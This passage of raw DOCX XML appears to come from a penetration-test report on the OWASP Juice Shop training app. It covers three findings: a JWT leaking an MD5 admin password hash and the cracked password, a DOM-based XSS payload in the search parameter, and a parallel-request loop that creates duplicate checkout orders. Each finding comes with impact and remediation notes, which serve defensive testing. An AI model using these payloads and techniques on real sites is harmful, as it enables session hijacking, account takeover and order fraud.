          <w:ilvl w:val="0"/>
          <w:numId w:val="1031"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Decode JWT payload (Base64):</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">{</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">data</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">:{</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">id</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">:1,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">email</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">admin@juice-sh.op</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">password</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">0192023a7bbd73250516f069df18b500</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">role</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">admin</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">}}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1031"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Password hash is MD5 format (32 hex characters)</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="108"/>
    <w:bookmarkStart w:id="109" w:name="technical-details"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Technical Details</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1032"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Hash algorithm: MD5</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1032"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Hash in token: 0192023a7bbd73250516f069df18b500</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1032"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Original password: admin123</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="109"/>
    <w:bookmarkStart w:id="110" w:name="affected-endpoints-2"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Affected Endpoints</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1033"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">/rest/user/login</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1033"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">/rest/user/whoami</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="110"/>
    <w:bookmarkStart w:id="111" w:name="remediation-3"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Remediation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1034"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Remove password hash from JWT payload</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1034"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Use stronger hashing algorithm (bcrypt, Argon2)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1034"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">JWT should only contain minimal necessary claims</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1034"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Implement token expiration and rotation</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111"/>
    <w:bookmarkStart w:id="119" w:name="finding-10"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Finding</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="118" w:name="dom-based-xss-in-search-query-parameter"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">DOM-based XSS in Search Query Parameter</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8.8</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">(</w:t>
            </w:r>
            <w:hyperlink r:id="rId33">
              <w:r>
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                </w:rPr>
                <w:t xml:space="preserve">CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N</w:t>
              </w:r>
            </w:hyperlink>
            <w:r>
              <w:t xml:space="preserve">)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">Assets</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">http://juiceshop:3000/#/search</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A DOM-based Cross-Site Scripting (XSS) vulnerability exists in the application’s search functionality. User-supplied input from the URL query parameter</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">‘</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">q</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">’</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">is processed by the Angular application and rendered without proper sanitization, allowing arbitrary JavaScript execution.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Attack Vector:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">The vulnerability is triggered when visiting a URL like:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">http://juiceshop:3000/#/search?q=&lt;img src=x onerror=alert(1)&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The Angular client-side router processes the hash fragment and injects the search query into the DOM without adequate output encoding, allowing the malicious payload to execute.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Reproduction Steps:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">1. Navigate to:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">http://juiceshop:3000/#/search?q=&lt;img src=x onerror=alert(1)&gt;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">2. The browser executes the JavaScript payload</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">3. An alert box with</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">‘</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">1</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">’</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">appears, confirming XSS execution</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Impact:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- Session hijacking via document.cookie theft</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- Privilege escalation through authenticated actions</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- Keylogging and credential theft from users</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- Phishing attacks via page content manipulation</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- Malware distribution to application users</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Root Cause:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">The Angular application processes user input from the URL hash fragment without proper sanitization. The search query is inserted into the DOM using unsafe patterns that allow script execution.</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Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1035"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Implement proper output encoding for all user-supplied content before rendering in the DOM</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Use Angular’s built-in sanitization with DomSanitizer for dynamic content</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Apply Content Security Policy (CSP) headers to restrict inline script execution</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Validate and sanitize URL parameters before processing</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Consider using Trusted Types to enforce safe DOM manipulation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Evidence</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1036"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">DOM-based XSS triggered via search query parameter showing alert(1) execution</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CaptionedFigure"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline>
            <wp:extent cx="5334000" cy="3371361"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr descr="DOM-based XSS triggered via search query parameter showing alert(1) execution" title="" id="113" name="Picture"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr descr="images/finding-ce71aec8-dc88-43d5-8ccd-ffb43274c559-16-xss-search-query-1740657201.png" id="114" name="Picture"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeArrowheads="1" noChangeAspect="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId112"/>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DOM-based XSS triggered via search query parameter showing alert(1) execution</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1037"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Confirmed DOM-based XSS with confirm(10) execution showing broken image payload injection</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CaptionedFigure"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline>
            <wp:extent cx="5334000" cy="3371361"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr descr="Confirmed DOM-based XSS with confirm(10) execution showing broken image payload injection" title="" id="116" name="Picture"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr descr="images/finding-ce71aec8-dc88-43d5-8ccd-ffb43274c559-19-xss-search-confirm-1740657801.png" id="117" name="Picture"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeArrowheads="1" noChangeAspect="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId115"/>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Confirmed DOM-based XSS with confirm(10) execution showing broken image payload injection</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="118"/>
    <w:bookmarkEnd w:id="119"/>
    <w:bookmarkStart w:id="122" w:name="finding-11"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Finding</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="121" w:name="X451d34f209f11472a730620f419191a944acd1d"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Business Logic Flaw - Race Condition in Checkout Allowing Duplicate Orders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4.2</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">(</w:t>
            </w:r>
            <w:hyperlink r:id="rId120">
              <w:r>
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                </w:rPr>
                <w:t xml:space="preserve">CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:N/I:L/A:L</w:t>
              </w:r>
            </w:hyperlink>
            <w:r>
              <w:t xml:space="preserve">)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">Assets</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">http://juiceshop:3000/rest/basket/, http://juiceshop:3000/rest/order-history</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checkout endpoint at</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">/rest/basket/{id}/checkout</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">lacks idempotency controls, allowing multiple duplicate orders to be created from a single basket when requests are sent in parallel. This violates the business invariant that one basket should result in exactly one order.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="121"/>
    <w:bookmarkEnd w:id="122"/>
    <w:bookmarkStart w:id="123" w:name="vulnerability-details"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Vulnerability Details</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">When multiple checkout requests are sent simultaneously for the same basket, the application processes all of them successfully instead of rejecting subsequent attempts after the first successful order. This indicates a lack of:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1038"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Idempotency key validation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1038"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Basket state locking during checkout</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1038"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Duplicate order prevention</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="123"/>
    <w:bookmarkStart w:id="124" w:name="proof-of-concept-4"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Proof of Concept</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Step 1: Add items to basket</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ExtensionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">POST</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> /api/BasketItems/</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ExtensionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">Body:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> {</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"ProductId"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">: 6, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"BasketId"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">: 27, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"quantity"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">: 1}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Step 2: Send parallel checkout requests</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># Run 3 checkout requests simultaneously</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ControlFlowTok"/>
        </w:rPr>
        <w:t xml:space="preserve">for</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> i </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">in</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> 1 2 3</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"http://juiceshop:3000/rest/basket/27/checkout"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rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">&amp;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ControlFlowTok"/>
        </w:rPr>
        <w:t xml:space="preserve">done</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="BuiltInTok"/>
        </w:rPr>
        <w:t xml:space="preserve">wait</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Step 3: Observe multiple order confirmations</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Response (3 separate responses):</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">{</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"orderConfirmation"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"4c66-4332ed412ef11d84"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">}</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">{</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"orderConfirmation"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"4c66-0438058ad418bf6a"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">}</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">{</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"orderConfirmation"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"4c66-062896ed48ebcdea"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Step 4: Verify duplicate orders in history</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ExtensionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">GET</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> /rest/order-history</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Result: 4 total orders (1 original + 3 duplicates) from a single basket.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="124"/>
    <w:bookmarkStart w:id="125" w:name="impact-4"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Impact</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1039"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Duplicate Orders</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: Multiple orders created for same items</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1039"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Inventory Issues</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: Stock counts may become inconsistent</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1039"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Customer Service</w:t>
      </w:r>
      <w:r>
